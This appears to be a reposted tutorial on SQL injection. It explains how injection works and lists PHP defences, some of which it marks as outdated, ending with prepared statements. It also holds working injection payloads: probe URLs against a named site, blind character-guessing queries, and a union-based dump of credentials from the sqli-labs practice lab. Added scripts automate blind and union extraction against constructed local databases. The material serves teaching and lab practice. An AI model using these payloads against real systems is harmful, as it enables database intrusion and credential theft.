A well-written explanation of the principle of SQL injection (worth a read when you have time)

We look at this topic from the following angles:

1. What is SQL injection?

2. Why does SQL injection happen?

3. How is SQL injection carried out?

1. What is SQL injection?

  SQL injection means inserting SQL commands into a web form, into a domain name, or into the query string of a page request so that the server is tricked into executing malicious SQL. The VIP member passwords that leaked from many video sites some years ago were mostly extracted through queries submitted via web forms; such forms are particularly prone to SQL injection. An injection becomes possible whenever an application builds a dynamic SQL statement from user input in order to access the database. The same applies to stored procedures: if the code passes unfiltered user input into a stored procedure as a string that is then executed, injection is still possible. With SQL injection an attacker can obtain access to the site's database and from there read all of its data; a malicious attacker can go further and tamper with or destroy that data. As a web developer you naturally hate this kind of attack, so it is necessary to understand how SQL injection works and to learn how to protect your database through your code.

The principle of SQL injection:

 Below we explain the principle of SQL injection so that the reader gets an intuitive feel for the attack; other injection attacks work on the same principle.

     SQL injection lets an attacker bypass the authentication mechanism and take complete control of the database on a remote server. SQL (Structured Query Language) is the de facto standard for database access, and most web applications today use a SQL database to store application data; almost every web application has some SQL database behind it. Like most languages, SQL lets commands and user data be mixed together in one string. If the developer is not careful, user data can be interpreted as part of the command, and then a remote user not only supplies data to the web application but also executes arbitrary commands on the database.

     SQL injection attacks take two main forms:

    ♦ First, direct injection: the input variable supplied by the user is concatenated straight into the SQL command that is then executed. The example cited earlier by the author uses this method. Because the input is tied directly to the SQL statement, this is called direct injection.

    ♦ Second, indirect injection: the malicious code is first stored in a table, or as string data, in the database itself. Later that stored string is concatenated into a dynamic SQL command and the malicious SQL runs. In both cases the injection works by terminating the text string early and then appending a new command. In direct injection, for example, the user's input first ends the current statement (with a semicolon) and then inserts a malicious SQL statement. Because the application may append further characters to the string before executing it, the attacker usually ends the injected text with a comment marker such as "--" (or "#" in MySQL): the server treats everything after it as a comment, so the rest of the original statement is ignored and never compiled or executed.

2. Why does SQL injection happen?

♦ The cause of SQL injection: during development the SQL statements are not written according to a standard and special characters in the input are not filtered, so a client can submit SQL fragments through the ordinary POST and GET variables.

Preventing SQL injection:

  1. Turn on the magic_quotes_gpc and magic_quotes_runtime settings in the PHP configuration file (legacy PHP only: both were deprecated in PHP 5.3 and removed in 5.4).

  2. Run user input through addslashes() before building the SQL statement.

  3. When writing SQL statements, do not omit the quotation marks (double or single) around values.

  4. Filter SQL keywords such as update, insert, delete, select and * out of the input (a weak measure on its own, since keyword blacklists are easily bypassed).

  5. Improve the naming of database tables and fields: name important fields according to the characteristics of the program so that they are not easily guessed.

  6. Set register_globals to off in the PHP configuration file, turning off the automatic registration of request parameters as global variables.

  7. Control error messages: do not print error messages to the browser; write them to a log file instead.

How to defend against SQL injection:

   1. Filter common database keywords out of the input: select, insert, update, delete, and, * and so on.

Or filter with the built-in function addslashes(content to be filtered). Note that keyword filtering and quote escaping only raise the bar; item 9 below is the measure that actually removes the problem.

  2. In the PHP configuration file set register_globals = off; // turn off register_globals.

For example, a value from a POST form is read with $_POST['user']; with register_globals = on, $user could be used directly with the value received from the form, so any request parameter silently becomes a variable in the script.

      3. When writing SQL statements, do not omit the quotation marks (the key above Tab) or single quotes around values.

      4. Improve the naming of the database objects: name important fields according to the characteristics of the program so that they are not easily guessed.

      5. Wrap commonly used operations in methods so that raw SQL statements are not scattered and exposed throughout the code.

      6. Turn on PHP safe mode: safe_mode = on; (removed in PHP 5.4).

      7. Turn on magic_quotes_gpc to prevent SQL injection. magic_quotes_gpc = off; may be the default depending on your php.ini. When it is on, PHP automatically escapes the data submitted by users before it reaches your SQL, turning ' into \', which goes some way toward preventing injection. It was removed in PHP 5.4, so do not rely on it.

So turn it on: magic_quotes_gpc = on;

      8. Control error messages.

Turn off error display; write error messages to the system log instead.

   9. Use mysqli or PDO prepared statements. The values are sent separately from the SQL text, so they can never be parsed as part of the statement.

 In one sentence: once programmers follow these rules, the attack becomes far harder.
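As an added example (not code from the original post), the following Python script contrasts the direct-injection form described above with the prepared-statement fix from item 9, and also shows why item 3 (never omit the quotes around a value) matters. An in-memory SQLite database with a constructed users table stands in for MySQL. Because SQLite escapes a quote by doubling it rather than with a backslash, the escape() helper here is a stand-in for addslashes(), not a port of it.

```python
import sqlite3

# Constructed in-memory database standing in for the application's MySQL
# backend (example code, not from the original post).
CONN = sqlite3.connect(":memory:")
CONN.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
CONN.executemany("INSERT INTO users VALUES (?, ?, ?)",
                 [(1, "admin", "s3cret"), (2, "bob", "hunter2")])


def login_concat(username, password):
    """Vulnerable: input spliced into the string (the post's direct injection).
    username = "' OR '1'='1' --" turns the WHERE into a tautology and the
    trailing comment marker discards the password check."""
    sql = ("SELECT id, username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return CONN.execute(sql).fetchall()


def login_param(username, password):
    """Hardened: placeholders, as with mysqli/PDO prepared statements (item 9).
    The values never become part of the SQL text, so they cannot change it."""
    sql = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return CONN.execute(sql, (username, password)).fetchall()


def escape(s):
    """Quote escaping in the spirit of addslashes()/magic_quotes_gpc.
    Assumption: SQLite doubles single quotes where MySQL would backslash them."""
    return s.replace("'", "''")


def lookup_unquoted(user_id):
    """Escaping applied but the value is left unquoted (violates item 3):
    a numeric payload such as "1 OR 1=1" contains no quote to escape."""
    sql = "SELECT id, username FROM users WHERE id = " + escape(user_id)
    return CONN.execute(sql).fetchall()


def lookup_quoted(user_id):
    """Escaping plus quoting: the whole payload stays inside the string literal."""
    sql = "SELECT id, username FROM users WHERE id = '" + escape(user_id) + "'"
    return CONN.execute(sql).fetchall()


def lookup_param(user_id):
    """Placeholder form: needs neither escaping nor manual quoting."""
    return CONN.execute("SELECT id, username FROM users WHERE id = ?",
                        (user_id,)).fetchall()


if __name__ == "__main__":
    bypass = "' OR '1'='1' --"
    print("concat login, tautology :", login_concat(bypass, "x"))
    print("param login, tautology  :", login_param(bypass, "x"))
    print("unquoted numeric        :", lookup_unquoted("1 OR 1=1"))
    print("quoted numeric          :", lookup_quoted("1 OR 1=1"))
    print("param numeric           :", lookup_param("1 OR 1=1"))
```

Running it shows the tautology returning every user from login_concat() and nothing from login_param(); the same "1 OR 1=1" payload returns both rows through lookup_unquoted() even though escape() was applied, and nothing through the quoted or parameterised forms.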

3. How is SQL injection carried out?

To make the principle of SQL injection easier to grasp, here is an outline of a SQL injection attack.

● The threats posed by SQL injection include the following:

        ● bypassing authentication and gaining access illegitimately

        ● guessing out all the information in the back-end database

        ● implanting malicious code, or using stored procedures to perform database operations such as privilege escalation

● The typical steps of a SQL injection attack:

        ● determine whether the application has an injection vulnerability

        ● collect information and determine the type of database

        ● depending on the type of the injected parameter, reconstruct the original SQL statement

        ● guess the table names and field names

        ● obtain account information, attack the web application, or prepare for the next attack

II. A simple example of SQL injection

1. Several ways to determine whether a SQL injection vulnerability exists

        ① http://www.heetian.com/showtail.asp?id=40'

        ② http://www.heetian.com/showtail.asp?id=40 and 1=1

        ③ http://www.heetian.com/showtail.asp?id=40 and 1=2

        If ① produces an error page or a database error message, an injection vulnerability is likely present.

        If ② displays correctly but ③ produces an error or an empty page, the page has an injection vulnerability.

The reasoning: the normal link http://www.heetian.com/showtail.asp?id=40 works. If ① then produces an error page or a database error, the stray quote reached the query unescaped and broke it, which shows the parameter is placed into a query as-is. If ② displays correctly while ③ breaks, the appended condition was evaluated by the database: "and 1=1" leaves the original condition true and "and 1=2" makes it false, so the page's content depends on what we inject, which confirms the injection vulnerability.

2. Collect information and determine the type of the database

        From the information the database returns (error messages, which functions work, and so on) we can learn the database type, some of its fields and other useful details, which lays the groundwork for the next step.

3. Reconstruct the original SQL statement from the type of the injected parameter

        ① When the parameter is numeric, as in ID=40, the original SQL statement is roughly: Select * from table where field = 40

        ② When the parameter is a string, as in name=movie, the original SQL statement is roughly: Select * from table where field = 'movie'

        ③ When the parameter is an unfiltered search term, as in keyword=keyword, the original SQL statement is roughly: Select * from table where field like '%keyword%'

4. Guess the table names and field names (by appending SQL directly to the URL)

        ① and exists(select * from table_name)

        If the page does not change, the added condition is satisfied, which means the guessed table name is correct; otherwise the table does not exist, and you keep guessing until you find the right name.

        ② and exists(select field_name from table_name)

        The principle is the same as above.

        ③ Guess the contents of the fields (compared with guessing table names and field names above, this is more tedious)

        ● First guess the length of the field's content:

        and (select top 1 len(field_name) from table_name) > 0, then > 1, > 2, and so on; the first n for which "> n" no longer holds is the length of the field.

        ● Once the length is known, guess the content character by character:

        and (select top 1 asc(mid(field_name, 1, 1)) from table_name) > 0, raising the number until "> m" no longer holds; that m is the ASCII code of the first character. Repeat with mid(field_name, 2, 1) and so on for the remaining positions. (top, len, asc and mid are the Access-style functions of the ASP example used here; MySQL uses limit, length, ascii and substring.)

                                                                         Of course there are other ways to guess the fields; I will demonstrate them next time.
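The detection probes from step 1 and the exists()/length/character guessing from step 4 are the building blocks of boolean-based blind injection. As an added example (not code from the original post), the Python script below runs them against a constructed SQLite stand-in for the vulnerable showtail.asp page, in which ?id= is spliced into the query. Everything the attacker learns comes from one bit per request: does the page still render? SQLite replaces Access here, so top 1/len/asc/mid become limit 1/length/unicode/substr. The character guessing goes beyond the post's linear "> m" walk by binary-searching the character code, which cuts the cost to about seven requests per character.

```python
import sqlite3

# Constructed stand-in for the vulnerable showtail.asp page (example code,
# not from the original post): ?id= is spliced straight into the query.
DB = sqlite3.connect(":memory:")
DB.executescript("""
CREATE TABLE article (id INTEGER, title TEXT);
INSERT INTO article VALUES (40, 'Hello world');
CREATE TABLE admin (id INTEGER, username TEXT, password TEXT);
INSERT INTO admin VALUES (1, 'root', 'Pa55');
""")


def page(id_param):
    """All the attacker sees: the article ('content'), a blank page
    ('empty'), or a database error ('error')."""
    try:
        row = DB.execute("SELECT title FROM article WHERE id = " + id_param).fetchone()
    except sqlite3.Error:
        return "error"
    return "content" if row else "empty"


def detect(base="40"):
    """The post's three probes: a lone quote breaks the SQL, 'and 1=1'
    changes nothing, 'and 1=2' makes the row disappear."""
    return (page(base + "'") == "error"
            and page(base + " and 1=1") == "content"
            and page(base + " and 1=2") != "content")


def truth(cond, base="40"):
    """Boolean oracle: does the page still render with cond appended?
    A non-existent table or column raises a database error, which also
    reads as False, so the same oracle serves the exists() guesses."""
    return page(base + " and (" + cond + ")") == "content"


def table_exists(table):
    return truth("exists(select * from " + table + ")")


def column_exists(table, column):
    return truth("exists(select " + column + " from " + table + ")")


def guess_length(table, column):
    """Raise n until 'length > n' stops holding; that n is the length."""
    n = 0
    while truth(f"(select length({column}) from {table} limit 1) > {n}"):
        n += 1
    return n


def guess_char(table, column, pos):
    """Binary search on the character code at position pos (1-based).
    'code > mid' true means the answer lies above mid, else at or below."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if truth(f"(select unicode(substr({column}, {pos}, 1)) from {table} limit 1) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def extract(table, column):
    """Length first, then one character at a time, exactly as in step 4."""
    n = guess_length(table, column)
    return "".join(guess_char(table, column, i) for i in range(1, n + 1))


if __name__ == "__main__":
    print("injectable:", detect())
    print("table admin:", table_exists("admin"), "column password:", column_exists("admin", "password"))
    print("admin password:", extract("admin", "password"))
```

The point of wrapping every request in truth() is that the rest of the attack never needs to see query output: once the page behaves differently for a true and a false condition, any value in the database can be read out bit by bit.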

 

Foreword

This article covers the basic process of manual SQL injection. It is essentially the sqli-labs exercises: if you know all of the knowledge in them, you can dump the database by following the steps below. These steps are also the basis for the other ways of dumping a database. If you want to become proficient in SQL injection, these are the most basic steps, which you must understand and master.

For convenience, we use the numeric-type injection point described earlier as the example.

Overall steps:

  1. Determine whether it is an injection point

  2. Find the total number of fields

  3. Find the displayed positions

  4. Find the database name

  5. Find the table names

  6. Find the column names

  7. Dump the database (that is, obtain the values of the columns we want)

1. Determine whether it is an injection point

   Several ways to determine a SQL injection vulnerability

        ① http://localhost/sqlilabs/Less-2/?id=1'

        ② http://localhost/sqlilabs/Less-2/?id=1 and 1=1

        ③ http://localhost/sqlilabs/Less-2/?id=1 and 1=2

        If ① produces an error page or a database error message, an injection vulnerability is present.

        If ② displays correctly but ③ produces an error or an empty page, the page has an injection vulnerability.

[Screenshot: the page returned for http://localhost/sqlilabs/Less-2/?id=1']

 

2. Find the total number of fields

  ♦ The back-end SQL statement is written roughly as follows:

select username,password,[....] from table where id=userinput

   ♦ We then use order by to find out how many fields the select statement queries: order by n sorts by the n-th selected column, so it produces an error as soon as n exceeds the number of columns.

The payload becomes:

http://localhost/sqlilabs/Less-2/?id=1 order by 1/2/3/4....

When order by 4 produces an error, the select has 3 fields in total.

 

3. Find the displayed positions

  ♦ The page displays some of the fields chosen by the select; the next step is to determine which of those fields are shown on the page.

  Either of the following payloads can be used to determine this.

http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,3
http://localhost/sqlilabs/Less-2/?id=1 and 1=2 union select 1,2,3

Both make the original query return no row, so the page shows the row produced by the union select, and the numbers that appear on the page are the displayed positions.

From the page returned for the payload above we can see that the 2nd and 3rd positions are displayed.

 

4. Find the database name

  ♦ Knowing the displayed positions, we can use them to display any information we want, such as the version and the current database name. The following payload gives that information.

http://localhost/sqlilabs/Less-2/?id=-1 union select 1,version(),database()

The page then displays the version and the current database name.

In the same way we can learn the names of all databases on the server. The payload is as follows:

http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,SCHEMA_NAME from information_schema.SCHEMATA limit 0,1   # get the first database name
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,SCHEMA_NAME from information_schema.SCHEMATA limit 1,1   # get the second database name
...

 

5. Find the table names

  ♦ Because database() returns the name of the database the web program is currently using, we use database() to query all the tables in it. From the previous step we already know the current database is security.

The payload is constructed as follows:

http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()

This gives all the table names in the current database. The page returns the result:

So we know there are four tables in the current database: emails, referers, uagents and users.

 

6. Find the column names

  ♦ Knowing the table name, we use information_schema.columns to obtain all the fields of that table by its name.

The payload is as follows:

http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273   (0x7573657273 is the hexadecimal encoding of users, which avoids the quotes)

The page displays the result:

From this statement we learn that the users table has the fields USER, CURRENT_CONNECTIONS, TOTAL_CONNECTIONS, id, username, password, id, name, password. In my local test, however, there was a problem: the users table in the security database actually has only the three fields id, username and password; the other fields are the column names of tables called users in other databases. The query above did not restrict table_schema, so every database's users table matched; adding "and table_schema=database()" to the where clause limits it to the current database.

With the same payload we can also find the column names in emails, referers and uagents.

Sometimes, however, the back-end does not let us query information_schema.columns to get the column names, and then they can only be guessed based on your own experience. Guessing is fairly simple: use an exists subquery. Assume we already know the table name (table names can of course also be guessed with exists).

The guessing statement is as follows:

http://localhost/sqlilabs/Less-2/?id=1 and exists(select uname from users)

The key part is the pattern exists(select column_name_to_guess from users). If the users table has no uname column, the page shows no content or directly shows a SQL error.

As shown below:

The following guesses a field that does exist in the users table.

http://localhost/sqlilabs/Less-2/?id=1 and exists(select username from users)

We guess that the users table has a username column; the statement above returns normally, which shows that the users table really does have a username column.

7. Dump the database (that is, obtain the values of the columns we want)

Once we know all the table names and field names of the current database, we can dump all the information in it. For example, to download all the data in the users table we can use the following payload:

http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(username,password),3 from users

This returns the username and password of every row in the users table (putting a separator such as 0x3a, a colon, between the two arguments of group_concat makes the output easier to read); data in other tables can be obtained the same way.
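Steps 2 to 7 above, run end to end as an added example (not the lab's PHP or the post's own code) against a constructed SQLite database that mimics sqli-labs Less-2: three columns selected, columns 2 and 3 echoed back. SQLite has no information_schema, so sqlite_master and pragma_table_info() stand in for information_schema.tables and information_schema.columns, and sqlite_version() for version(); the MySQL forms are given in the comments. The request behaviour the script relies on is the one the lab shows: order by past the last column errors, and a union row with a non-matching id lands on the page.

```python
import sqlite3

# Constructed stand-in for sqli-labs Less-2 (example code, not the lab's PHP).
# SQLite replaces MySQL, so information_schema becomes sqlite_master and
# pragma_table_info(), and version() becomes sqlite_version().
DB = sqlite3.connect(":memory:")
DB.executescript("""
CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'Dumb', 'Dumb'), (2, 'Angelina', 'I-kill-you');
CREATE TABLE emails (id INTEGER, email_id TEXT);
INSERT INTO emails VALUES (1, 'Dumb@dhakkan.com');
""")


def page(id_param):
    """Less-2 style handler: numeric ?id= spliced into the SQL; the page
    echoes columns 2 and 3 (username, password) of the first row.
    Returns (echoed_fields or None, error_text or None)."""
    sql = "SELECT id, username, password FROM users WHERE id=" + id_param + " LIMIT 1"
    try:
        row = DB.execute(sql).fetchone()
    except sqlite3.Error as e:
        return None, str(e)
    if row is None:
        return None, None
    return (row[1], row[2]), None


def count_columns(max_cols=20):
    """Step 2: ORDER BY n errors once n exceeds the SELECT's column count."""
    for n in range(1, max_cols + 1):
        _, err = page("1 order by " + str(n))
        if err:
            return n - 1
    return None


def display_positions(ncols):
    """Step 3: UNION a row of markers 1..ncols and read back which land
    on the page."""
    fields, _ = page("-1 union select " + ",".join(str(i) for i in range(1, ncols + 1)))
    return [int(f) for f in fields]


def inject(expr):
    """Put expr into the first displayed column of the UNION row and return
    what the page prints for it.  (Recomputes the layout on every call for
    simplicity; a real tool would do steps 2 and 3 once.)"""
    ncols = count_columns()
    positions = display_positions(ncols)
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[positions[0] - 1] = expr
    fields, _ = page("-1 union select " + ",".join(cols))
    return fields[0]


def list_tables():
    """Step 5.  MySQL form: select group_concat(table_name) from
    information_schema.tables where table_schema=database()"""
    return inject("(select group_concat(name) from sqlite_master where type='table')").split(",")


def list_columns(table):
    """Step 6.  MySQL form: select group_concat(column_name) from
    information_schema.columns where table_schema=database() and
    table_name='users' (the table_schema filter avoids the stray columns
    from other databases' users tables that the post ran into)."""
    return inject(f"(select group_concat(name) from pragma_table_info('{table}'))").split(",")


def dump(table, columns):
    """Step 7.  MySQL form: select group_concat(username,0x3a,password) from users.
    SQLite's group_concat takes one expression, hence the || joins."""
    joined = "||':'||".join(columns)
    return inject(f"(select group_concat({joined}) from {table})").split(",")


if __name__ == "__main__":
    n = count_columns()
    print("columns:", n, "displayed:", display_positions(n))
    print("version:", inject("sqlite_version()"))
    for t in list_tables():
        cols = list_columns(t)
        print(t, cols, dump(t, cols))
```

Each function maps to one of the URLs in the steps above; only the string handed to page() changes, which is why the whole procedure automates so readily once the column count and displayed positions are known.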

 

Summary: this is the principle of SQL injection, but you also need to know:

  1. the MySQL system functions

  2. how union works

  3. order by, which sorts the result set

  4. the four important default MySQL databases: information_schema, performance_schema, mysql, test

  5. the three important columns of information_schema.tables: table_name, table_schema, table_type

  6. understanding what schema, schemata, schema_name and table_schema mean is very important! Very important! Very important! (said three times ~)

 I will write these up later.

 

Source: https://www.cnblogs.com/insane-Mr-Li/p/9138633.html

https://www.cnblogs.com/insane-Mr-Li/p/9133602.html


Origin: www.cnblogs.com/kaibindirver/p/11520862.html